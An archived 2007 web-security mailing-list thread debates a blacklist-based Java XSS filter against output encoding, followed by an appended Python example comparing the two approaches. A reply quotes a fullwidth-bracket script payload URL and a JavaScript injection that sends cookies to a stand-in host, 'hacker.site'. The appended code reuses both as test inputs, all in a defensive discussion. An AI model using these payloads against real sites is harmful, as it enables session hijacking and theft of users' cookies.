
Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks




Well I have seen Microsoft's AntiXSSLibrary to be very effective for .Net
applications and to cover your point it is part of .NET "Framework".

Of course, that does not resolve the need for Java based applications per se
but I am not sure if I agree with points 1 & 2 in your email.

Thanks.

On 1/23/07, Anurag Agarwal <a_agrawwal@yahoo.com> wrote:
>
> I agree that it does not cover all the websites. For example, blogs which
> let you enter certain html characters or the mathematics site as you
> mentioned, but then in my opinion 5-10% of the websites would require such
> data and even those sites would not require it in all of the input. Most of the
> websites in their regular functionality would not even need the filtered
> characters here as input.
>
>
>
> Anti xss library or such options exist but there are two things i wanted
> to mention about them
>
>
>
> 1. How many developers would put in an effort to understand the library
> and use them as directed. This is a very simple approach and any java
> developer would be able to understand this. Moreover, it is very easy to
> implement.
>
> 2. This is a very lightweight module as compared to an anti xss library.
> In a production environment why would you want to add more CPU processing
> when you don't need it. With my example this is as simple as it gets for the
> websites which really don't need any of the blacklisted characters here.
>
>
>
> Also,
>
> Even though this approach is considered a blacklisted-characters approach, in
> my opinion these are the characters which are used in combination to
> perform an attack (for example using backslash as escape character, 0x for
> hex, etc). So by blocking them we cover most of the bases (when I say most,
> I mean I am not sure if I missed any character and hence posted here for
> my fellow appsec professionals to uncover any such character).
>
>
>
> Lastly -
> One thing I would like to point out here is that in my personal opinion
> more than 40% of the code in production is a result of copy-paste from
> the internet. Developers are looking for a solution which is easier to
> understand and implement. My solution here may be limited for certain types
> of websites but can definitely work for most of them.
>
> Unless a proper anti xss library is built into the framework, there is a
> bigger chance that the developers might not use it properly. This code here
> can fix most of the vulnerabilities. Agreed, not all, but then that's why I
> posted on these forums to get ideas to build this into a more robust and
> reusable xss filter.
>
>
> Cheers,
>
>
>
> Anurag Agarwal
>
>
>
> SEEC - An application security search engine<http://www.myappsecurity.com/>
>
> Web: www.attacklabs.com , www.myappsecurity.com
>
> Email : anurag.agarwal@yahoo.com
>
> Blog : http://myappsecurity.blogspot.com
>
>
>
>
> ----- Original Message ----
> From: celf <celf@cudge.org>
> To: "webappsec @OWASP" <webappsec@lists.owasp.org>
> Cc: WASC Forum <websecurity@webappsec.org>
> Sent: Tuesday, January 23, 2007 8:25:14 AM
> Subject: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss
> attacks
>
> Hello,
>
> The main problem I see with it is that it could corrupt your data. There
> may be cases when you actually need those characters to be stored. Take
> for example, mathematics. It's not uncommon for greater-than, etc.,
> symbols to be used. Input validation as a means to make output safe does
> not work, at least not for very long. The simple approach to protecting
> against XSS is to encode it properly for the output layer.
>
> I maintain that the best way to do this is to format output characters
> into their appropriate HTML entities (JavaScript output
> notwithstanding). So, < becomes &lt; or &#60;. In fact, I've a page that
> does no input validation at all, but transforms every output character
> NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.
>
> Second, your filtering approach is the standard "blacklist" approach,
> and while it may be fine for most things, there will be circumstances when
> it won't. Take for example:
>
>
> http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=Submit<http://www.attacklabs.com/xssfilter/filter?html=%25uff1cscript%25uff1ealert%28>
>
> On your site, this simple attack does not work. However, there is a
> known vulnerability in .NET <= 1.1 that does allow this script to
> execute. Note that I didn't try very hard, someone else YMMV.
>
> http://lists.seifried.org/pipermail/security/2005-February/007054.html
>
> Finally, your filter won't work for dynamic parameters being written into
> JavaScript (which I see all the time as an XSS vector), e.g.,
>
> code:
> response.write("<script>x='"&<%=server_side_var%>&"';alert(x);</script>")
>
> exploit (sending this as the server side param value):
> a'; document.location='hacker.site?cookies='+document.cookies;var y='a
>
> So, your approach works, it's just tough to maintain when new exploits
> come out or when not applied to a very specific case. Admittedly, my
> approach isn't complete here either, but I'm sure others have more to add.
>
> -c
>
> anurag.agarwal@yahoo.com wrote:
> > The source code is uploaded to the page. You can either view it
> > at
> http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html or
> > download the java file at
> http://www.attacklabs.com/xssfilter/XSSFilter.java
> >
> > The url to test this filter is http://www.attacklabs.com/xssfilter/
> >
> >
> > Cheers,
> >
> >
> >
> > Anurag Agarwal
> >
> >
> >
> > SEEC - An application security search engine <
> http://www.myappsecurity.com/>
> >
> > Web: www.attacklabs.com <http://www.attacklabs.com/> ,
> > www.myappsecurity.com <http://www.myappsecurity.com/>
> >
> > Email : anurag.agarwal@yahoo.com <mailto:anurag.agarwal@yahoo.com>
> >
> > Blog : http://myappsecurity.blogspot.com
> > <http://myappsecurity.blogspot.com/>
> >
> >
> >
> >
> >
> > ----- Original Message ----
> > From: Amit Klein <aksecurity@gmail.com>
> > To: Anurag Agarwal <anurag.agarwal@yahoo.com>
> > Cc: WASC Forum <websecurity@webappsec.org>; "webappsec @OWASP"
> > <webappsec@lists.owasp.org>
> > Sent: Monday, January 22, 2007 11:50:06 PM
> > Subject: Re: [Webappsec] xss filter to protect from xss attacks
> >
> > Anurag Agarwal wrote:
> >> I have created an xss filter to protect from xss attacks. Though I have
> >> filtered only for 8 characters, I was able to test against all the
> >> attacks mentioned in RSnake's cheat sheet. Appscan was not able to
> >> detect any xss attacks on it. I request the application security
> >> community to help test this filter. 90% I am sure that you won't be
> >> able to perform any xss attack on it, the rest 10% I will find out
> >> after the feedback from the community. For the curious mind, it is
> >> written in java
> > If this is an open source project - then where is the source code? if
> > it's not - then why should we bother testing it?
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Webappsec mailing list
> > Webappsec@lists.owasp.org
> > http://lists.owasp.org/mailman/listinfo/webappsec
>
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


-- 
Prasad
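The disagreement in the thread above (a blacklist of a handful of input characters versus encoding every output character for the context it lands in, with the JavaScript-string case celf singles out) is easier to see side by side. The following is an added example, not code from the thread, from XSSFilter.java or from Microsoft's AntiXSS library; the 8-character set of the real filter is not on the page, so `BLACKLIST` is an assumed stand-in, and the three sample inputs are constructed here (the fullwidth `U+FF1C`/`U+FF1E` string mirrors the `%uff1c`/`%uff1e` URL quoted in the thread).

```python
# Added example: blacklist input filtering versus per-context output encoding.
# BLACKLIST is an assumption standing in for the thread's "8 characters";
# the real XSSFilter.java character set is not reproduced here.

BLACKLIST = set('<>"\'%;()&')   # assumed ASCII characters a blacklist filter would strip


def blacklist_filter(value: str) -> str:
    """Input-side filter in the style of the thread: drop blacklisted characters."""
    return ''.join(c for c in value if c not in BLACKLIST)


def html_entity_encode(value: str) -> str:
    """celf's output rule: every character that is not A-Za-z0-9 becomes a
    numeric entity.  ord() yields the code point, so this also covers
    multi-byte / non-ASCII characters such as fullwidth angle brackets."""
    return ''.join(c if c.isascii() and c.isalnum() else f'&#{ord(c)};' for c in value)


def js_string_encode(value: str) -> str:
    """The 'JavaScript output notwithstanding' case: the value is placed inside a
    JS string literal, so quote, backslash, ';', '<' and '/' are all reduced to
    \\xHH or \\uHHHH escapes that cannot close the literal or the script tag.
    HTML entities would NOT help here: the HTML parser does not decode them
    inside <script>."""
    out = []
    for c in value:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 0x100:
            out.append('\\x%02x' % ord(c))
        else:
            out.append('\\u%04x' % ord(c))
    return ''.join(out)


def render_html(value: str) -> str:
    """HTML body context."""
    return f'<p>{html_entity_encode(value)}</p>'


def render_script(value: str) -> str:
    """The response.write pattern from the thread, with the value encoded for the
    JS string context instead of concatenated raw into the literal."""
    return f"<script>x='{js_string_encode(value)}';alert(x);</script>"


# Constructed sample inputs.
MATH_INPUT = "a < b"   # legitimate data, the mathematics case celf raises
FULLWIDTH_INPUT = "\uff1cscript\uff1ealert('xss')\uff1c/script\uff1e"   # %uff1c / %uff1e from the quoted URL
JS_INPUT = "a'; document.location='hacker.site?cookies='+document.cookies;var y='a"   # the quoted JS-context payload


def compare(value: str) -> dict:
    """What each approach does to one input: the blacklist either corrupts the
    data (MATH_INPUT) or passes characters it never listed (FULLWIDTH_INPUT);
    output encoding keeps the data and neutralises it for its context."""
    return {
        'blacklist': blacklist_filter(value),
        'html': render_html(value),
        'script': render_script(value),
    }


if __name__ == '__main__':
    for name, value in [('math', MATH_INPUT), ('fullwidth', FULLWIDTH_INPUT), ('js', JS_INPUT)]:
        print(name)
        for approach, rendered in compare(value).items():
            print(f'  {approach:10} {rendered}')
```

Running it shows the two failure modes in one place: `blacklist_filter("a < b")` silently turns the expression into `a  b`, while the fullwidth brackets sail through unchanged because they are not in the list; `html_entity_encode` leaves the data recoverable (`a&#32;&#60;&#32;b`, `&#65308;script&#65310;...`) and `js_string_encode` keeps the single quote and `</script>` of the template as the only ones in the output, so the quoted payload cannot break out of the literal.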
